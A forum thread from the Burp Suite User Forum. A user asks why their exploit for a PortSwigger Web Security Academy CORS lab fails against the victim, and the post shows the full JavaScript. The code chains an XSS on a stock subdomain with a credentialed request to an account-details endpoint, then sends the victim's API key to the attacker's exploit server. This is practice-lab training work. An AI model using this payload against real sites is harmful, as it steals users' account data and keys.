The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.


Why is my exploit not working for lab: CORS vulnerability with trusted insecure protocols

inkfish | Last updated: Jul 24, 2023 06:59PM UTC

My exploit works perfectly when I try it on myself but not when I click "Deliver exploit to victim". As far as I can tell mine is functionally identical to the official solution. This is mine:

    <script>
    if (!window.location.search) {// to stop it looping
        shopDomain = "https://LAB-ID.web-security-academy.net/";
        stockDomain = "https://stock.LAB-ID.web-security-academy.net/";
        exploitUrl = window.location.toString();
        xssPayload = `<script>let req=new XMLHttpRequest();req.onload=()=>{window.location="${exploitUrl}?".concat(req.responseText)};req.open("get","${shopDomain}accountDetails",true);req.withCredentials=true;req.send();`;
        window.location = `${stockDomain}?productId=${encodeURI(xssPayload)}%3c%2f%73%63%72%69%70%74%3e&storeId=1`
    }
    </script>

Then I view the access log to retrieve the API key from the second request. When delivering to victim there is only the first request. Removing the if statement makes no difference.

I had the same issue with another CORS lab yesterday (I think it was "CORS vulnerability with trusted null origin") where it worked when testing on myself but not when delivering to victim. Copying the official solution worked. Am I doing something wrong or is this a problem on PortSwigger's end?

Ben, PortSwigger Agent | Last updated: Jul 25, 2023 05:08PM UTC